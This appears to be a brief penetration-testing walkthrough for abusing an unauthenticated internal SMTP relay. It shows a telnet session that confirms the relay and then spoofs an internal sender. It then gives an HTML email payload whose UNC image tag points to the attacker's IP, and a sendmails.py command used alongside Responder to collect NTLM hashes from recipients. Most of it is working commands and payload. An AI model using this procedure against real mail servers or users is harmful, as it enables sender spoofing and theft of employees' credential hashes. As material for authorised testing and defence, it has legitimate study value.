SMTP Internal UNC Relay Exploit

A quick walk through on how to exploit internal relay via smtp, this bypass common outlook restrictions on blocking auto downloading of images, so when you identify a vulnerable target this can result in easy hash collection.

telnet IP-Address 25

Trying IP-Address…

Connected to IP-Address.

Escape character is ‘^]’.

220 ************************************************************************************************

HELO

250 Domain.domain-name-co.uk Hello [IP-Address]

MAIL FROM:name@domain-name-co.uk250 1.1.0 Sender OK

RCPT TO: internal.name@domain-name-co.uk

250 1.1.5 Recipient OK

DATA

354 Start mail input; end with <CRLF>.<CRLF>

Please email me (Add address) if you receive this?

.

250 1.6.0 <internal.name@domain-name.co.uk> [Internal ID=221411] Queued mail for delivery

——————

It’s a little tricky to end the message while testing but, <CRLF>.<CRLF> = press enter . press enter

If you see Queued mail for delivery this is a great sign as it indicates that the target is vulnerable to internal smtp relay.

1. Write your email and save as .htm (to do this I use outlook to create the email, I send it to myself and save it as a .htm)

2. Open the in notepad++ delete out all sections not required.

3. Add the UNC image tag to the bottom line of the email just before </body>

</div>

<img src=”file:///\\IP-Address/test”>

</body>

</html>

Then to send the email you can use any method which accepts .htm emails and supports relay, I commonly use @strawp sendmail script.

4. Use https://github.com/strawp/random-scripts sendmails.py script

5. Set up responder

6. Send the email using sendmail script, syntax below.

python sendmails.py -g SMTP-IP-Address -p 25 -e Email-address -b UNCPic.htm -f internal.name@domain-name-co.uk -s question

@myexploit2600